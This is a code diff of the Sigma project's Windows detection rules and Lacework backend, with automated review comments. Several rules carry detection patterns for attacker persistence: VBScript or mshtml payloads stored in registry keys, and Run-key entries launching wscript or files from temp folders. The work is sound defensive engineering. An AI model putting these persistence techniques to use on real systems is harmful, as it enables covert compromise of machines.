a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml 
@@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' 
@@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' 
diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion 
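Review bot: The narrowing of `'vbscript'`/`'jscript'`/`'mshtml'` to `'vbscript:'`/`'jscript:'`/`'mshtml,'` and the removal of `'RegRead'` is not explained anywhere in the rule, so the next maintainer cannot tell which false positive drove it or whether the `mshtml,` form is deliberate. A one-line comment above `Details|contains:` such as `# protocol-handler form (vbscript:/jscript:) and "mshtml,RunHTMLApplication"; the bare substrings matched installer metadata` would preserve that reasoning, with the actual trigger filled in by the author. The collapsed `'_mshtml_dll_'` filter value is a sensible generalisation of the two removed `FL_Microsoft_mshtml_dll_` patterns.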
diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh
index 4c3929b90..1c9bae2f7 100755
--- a/tests/check-baseline-local.sh
+++ b/tests/check-baseline-local.sh
@@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then
 exit 1
 fi
+if [[ -z $(command -v xargs) ]]; then
+ >2& echo "xargs not found. Please install findutils."
+ >2& echo "Exiting"
+ exit 1
+fi
+
+if [[ -z $(command -v tar) ]]; then
+ >2& echo "tar not found. Please install."
+ >2& echo "Exiting"
+ exit 1
+fi
+
+if [[ -z $(command -v mktemp) ]]; then
+ >2& echo "mktemp not found. Please install coreutils."
+ >2& echo "Exiting"
+ exit 1
+fi
+
 if [[ -z $(command -v realpath) ]]; then
 >2& echo "realpath not found. Please install coreutils."
 >2& echo "Exiting"
@@ -95,6 +113,7 @@ PID2OS[$!]=$OS
 # Windows 10
 OS="Windows 10"
 {
+ sleep 10
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz
 tar xzf win10-client.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)"
@@ -107,6 +126,7 @@ PID2OS[$!]=$OS
 # Windows 2022 AD
 OS="Windows 2022 AD"
 {
+ sleep 20
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz
 tar xzf win2022-ad.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)"
@@ -119,6 +139,7 @@ PID2OS[$!]=$OS
 # Windows 11
 OS="Windows 11"
 {
+ sleep 30
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz
 tar xzf win11-client.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)"
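Review bot: The three new tool checks copy `>2& echo "..."` from the existing realpath block, but `>2&` is not a stderr redirection: bash reads `>2` as "redirect stdout to a file named 2", the `&` backgrounds that empty command, and the `echo` then runs as a separate foreground command writing to stdout. The result is a stray file named `2` in the working directory and error text on stdout rather than stderr; the intended form on each of the six new echo lines is `>&2 echo "xargs not found. Please install findutils."` (or `echo "..." >&2`). The pre-existing realpath block visible as context has the same defect and could be corrected in the same pass.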
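Review bot: The new `sleep 10` (and `sleep 20`/`sleep 30` in the two following hunks, `sleep 40` in the Azure job) carries no comment, so a reader cannot tell whether it staggers the parallel downloads on purpose or is a leftover from debugging. If it is a deliberate stagger, say so on the line, e.g. `sleep 10  # stagger the parallel downloads so they do not all start at once`; if it was meant as a retry/backoff for wget, `--tries`/`--waitretry` on the wget line would express that directly. Each `{ … }&` job starts inside its hunk but its closing brace lies outside it.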
@@ -128,6 +149,19 @@ OS="Windows 11"
 pids+=($!)
 PID2OS[$!]=$OS
+# Windows 2022.0.20348 Azure
+OS="Windows 2022.0.20348 Azure"
+{
+ sleep 40
+ wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz
+ tar xzf win2022-0-20348-azure.tgz
+ echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)"
+ ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json
+ echo " Finished Checking for Sigma matches in $OS baseline"
+}&
+pids+=($!)
+PID2OS[$!]=$OS
+
 # Sync with all background jobs
 for pid in ${pids[*]}; do
 echo "===> Waiting for PID $pid / ${PID2OS[$pid]}"
@@ -153,6 +187,9 @@ echo "Windows 2022:"
 echo
 echo "Windows 2022 AD:"
 "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv
+echo
+echo "Windows 2022.0.20348 Azure:"
+"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv
 echo
 read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s
diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml
index 01b6d3de5..11bc25aa4 100644
--- a/tools/config/generic/windows-services.yml
+++ b/tools/config/generic/windows-services.yml
@@ -166,3 +166,18 @@ logsources:
 service: bits-client
 conditions:
 Channel: 'Microsoft-Windows-Bits-Client/Operational'
+ windows-diagnosis-scripted:
+ product: windows
+ service: diagnosis-scripted
+ conditions:
+ Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational'
+ windows-shell-core:
+ product: windows
+ service: shell-core
+ conditions:
+ Channel: 'Microsoft-Windows-Shell-Core/Operational'
+ security-mitigations:
+ product: windows
+ service: security-mitigations
+ conditions:
+ Provider_Name: 'Microsoft-Windows-Security-Mitigations'
\ No newline at end of file
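Review bot: The Azure job has no failure handling between download and check: if `wget --quiet` or `tar xzf` fails (nothing visible suggests the script runs under `set -e`), `./evtx-sigma-checker` still runs against a missing `win2022-0-20348-azure/` directory and the job still prints "Finished Checking", so an empty findings file passes the baseline silently. Suggest `wget --quiet … || { echo "download of win2022-0-20348-azure.tgz failed" >&2; exit 1; }` and the same for `tar`; and since the archive comes from a `releases/latest` URL and is extracted with no integrity check, pinning a release tag or verifying a published checksum would make the baseline reproducible. The pre-existing jobs share the pattern, so a small helper function taking the OS label and archive name would remove the four-fold duplication.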
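Review bot: The `security-mitigations` logsource keys on `Provider_Name` while every sibling in this file, including the two new entries above it, keys on `Channel`; the difference deserves a comment, presumably because this provider writes to more than one channel (KernelMode and UserMode), e.g. `# matched on provider: events are split across the KernelMode and UserMode channels`, and the author should confirm that is the intent. The added block also drops the trailing newline the file previously had (`\ No newline at end of file`); restore it so the next append produces a clean diff.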
diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py
index f3c5eb870..df4e60f0c 100644
--- a/tools/sigma/backends/lacework.py
+++ b/tools/sigma/backends/lacework.py
@@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier
 LACEWORK_CONFIG = yaml.load(
 textwrap.dedent('''
 ---
- version: 0.3
+ version: 0.4
 services:
 cloudtrail:
- evaluatorId: Cloudtrail
 source: CloudTrailRawEvents
 fieldMap:
 - sigmaField: eventName
@@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load(
 alertProfile: LW_CloudTrail_Alerts
 product.categories:
 linux.file_create:
- evaluatorId:
- source: LW_HE_FILES
+ sources:
+ - LW_HE_FILES
 conditions:
 # evaluated hourly and file create time within the last hour
 - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60
@@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load(
 - OWNER_USERNAME
 - FILE_CREATED_TIME
 alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation
+ linux.network_connection:
+ sources:
+ - LW_HA_CONNECTION_SUMMARY as HACM
+ - array_to_rows(ENDPOINT_DETAILS) as (EP_PA)
+ fieldMap:
+ - sigmaField: Image
+ laceworkField: EXE_PATH
+ matchType: exact
+ action: selfjoin
+ selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }}
+ - sigmaField: DestinationIp
+ laceworkField: EP_PA:dst_ip_addr
+ matchType: exact
+ - sigmaField: DestinationHostname
+ laceworkField:
+ matchType: exact
+ action: raise
+ returns:
+ - HACM.BATCH_END_TIME
+ - HACM.BATCH_START_TIME
+ - HACM.DST_ENTITY_ID
+ - HACM.DST_ENTITY_TYPE
+ - HACM.DST_IN_BYTES
+ - HACM.DST_OUT_BYTES
+ - HACM.ENDPOINT_DETAILS
+ - HACM.NUM_CONNS
+ - HACM.SRC_ENTITY_ID
+ - HACM.SRC_ENTITY_TYPE
+ - HACM.SRC_IN_BYTES
+ - HACM.SRC_OUT_BYTES
+ alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation
 linux.process_creation:
- evaluatorId:
- source: LW_HE_PROCESSES
+ sources:
+ - LW_HE_PROCESSES
 conditions:
 # evaluated hourly and file create time within the last hour
 - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60
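Review bot: The `selfJoinFilter` for `Image` embeds a literal `filter { EXE_PATH like '%/bin/bash' }` in its sub-query; if the backend substitutes the rule's actual Image value into that clause, the line should mark it as a template (a placeholder token or a comment), and if it does not, every `linux.network_connection` rule is silently restricted to processes whose path ends in `/bin/bash` regardless of what the Sigma rule says. A comment on that line stating which of the two applies would stop the next reader from guessing. The `DestinationHostname` mapping has an empty `laceworkField:` with `action: raise`; a note such as `# no hostname column in HACM: rules that use this field are rejected` would document the intent. This YAML lives inside the `LACEWORK_CONFIG` string literal, whose start and end lie outside the hunk.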
@@ -489,22 +519,18 @@ class LaceworkQuery:
 self.logsource_config = self.get_logsource_config(
 config, self.logsource_type, self.logsource_name)
- # 3. Get Evaluator ID
- self.evaluator_id = self.get_evaluator_id(
- self.logsource_name, self.logsource_config)
-
- # 4. Get Query ID
+ # 3. Get Query ID
 self.title, self.query_id = self.get_query_id(rule)
- # 5. Get Query Source
- self.query_source = self.get_query_source(
+ # 4. Get Query Source
+ self.query_sources = self.get_query_sources(
 self.logsource_name, self.logsource_config)
- # 6. Get Query Returns
+ # 5. Get Query Returns
 self.returns = self.get_query_returns(
 self.logsource_name, self.logsource_config)
- # 7. Get Query Text
+ # 6. Get Query Text
 self.query_text = self.get_query_text(backend, conditions)
 def get_query_text(self, backend, rule_conditions):
@@ -539,8 +565,9 @@ class LaceworkQuery:
 ' {source}\n'
 ' }}'
 )
+
 return source_block_template.format(
- source=self.query_source
+ source=',\n '.join(self.query_sources)
 )
 def get_query_return_block(self):
@@ -555,7 +582,6 @@ class LaceworkQuery:
 def __iter__(self):
 for key, attr in {
- 'evaluatorId': 'evaluator_id',
 'queryId': 'query_id',
 'queryText': 'query_text'
 }.items():
@@ -623,12 +649,6 @@ class LaceworkQuery:
 return logsource_config
- @staticmethod
- def get_evaluator_id(logsource_name, logsource_config):
- # 3. validate service has an evaluatorId mapping
- evaluator_id = safe_get(logsource_config, 'evaluatorId', str)
- return evaluator_id if evaluator_id else None
-
 @staticmethod
 def get_query_id(rule):
 title = safe_get(rule, 'title', str) or 'Unknown'
@@ -638,15 +658,18 @@ class LaceworkQuery:
 return title, query_id
 @staticmethod
- def get_query_source(logsource_name, logsource_config):
+ def get_query_sources(logsource_name, logsource_config) -> list[str]:
 # 4. validate service has a source mapping
 source = safe_get(logsource_config, 'source', str)
+ sources = safe_get(logsource_config, 'sources', list)
- if not source:
- raise BackendError(
- f'Lacework backend could not determine source for logsource {logsource_name}')
+ if sources:
+ return sources
+ elif source:
+ return [source]
- return source
+ raise BackendError(
+ f'Lacework backend could not determine source for logsource {logsource_name}')
 @staticmethod
 def get_query_returns(logsource_name, logsource_config):
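Review bot: `get_query_sources` returns the configured `sources` list unchecked, so an entry that is not a string (a YAML null from a dangling `-`, or a nested mapping) passes validation here and only fails later in `get_query_source_block`'s `',\n '.join(...)` with a TypeError that does not name the logsource; the `-> list[str]` annotation promises more than the body verifies. Suggest guarding the list branch, `if sources and all(isinstance(s, str) for s in sources): return sources`, and letting the existing `BackendError` cover everything else, or raising a `BackendError` that names the offending entry. Separately, `list[str]` as a runtime annotation requires Python 3.9+ (or `from __future__ import annotations`); if the project still supports older interpreters the method definition fails at import time. The enclosing `class LaceworkQuery` starts outside the hunk.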
@@ -703,42 +726,37 @@ class LaceworkPolicy:
 self.logsource_config = LaceworkQuery.get_logsource_config(
 config, self.logsource_type, self.logsource_name)
- # 3. Get Evaluator Id
- self.evaluator_id = LaceworkQuery.get_evaluator_id(
- self.logsource_name, self.logsource_config)
-
- # 4. Get Title
- # 5. Get Query ID
+ # 3. Get Title
+ # 4. Get Query ID
 self.title, self.query_id = LaceworkQuery.get_query_id(rule)
- # 6. Get Enabled
+ # 5. Get Enabled
 self.enabled = False
- # 7. Get Policy Type
+ # 6. Get Policy Type
 self.policy_type = 'Violation'
- # 8. Get Alert Enabled
+ # 7. Get Alert Enabled
 self.alert_enabled = False
- # 9. Get Alert Profile
+ # 8. Get Alert Profile
 self.alert_profile = self.get_alert_profile(
 self.logsource_name, self.logsource_config)
- # 10. Get Limit
+ # 9. Get Limit
 self.limit = 1000
- # 11. Get Severity
+ # 10. Get Severity
 self.severity = safe_get(rule, 'level', str) or 'medium'
- # 12. Get Description
+ # 11. Get Description
 self.description = safe_get(rule, 'description', str)
- # 13. Get Remediation
+ # 12. Get Remediation
 self.remediation = 'Remediation steps are not represented in Sigma rule specification'
 def __iter__(self):
 for key, attr in {
- 'evaluatorId': 'evaluator_id',
 'title': 'title',
 'enabled': 'enabled',
 'policyType': 'policy_type',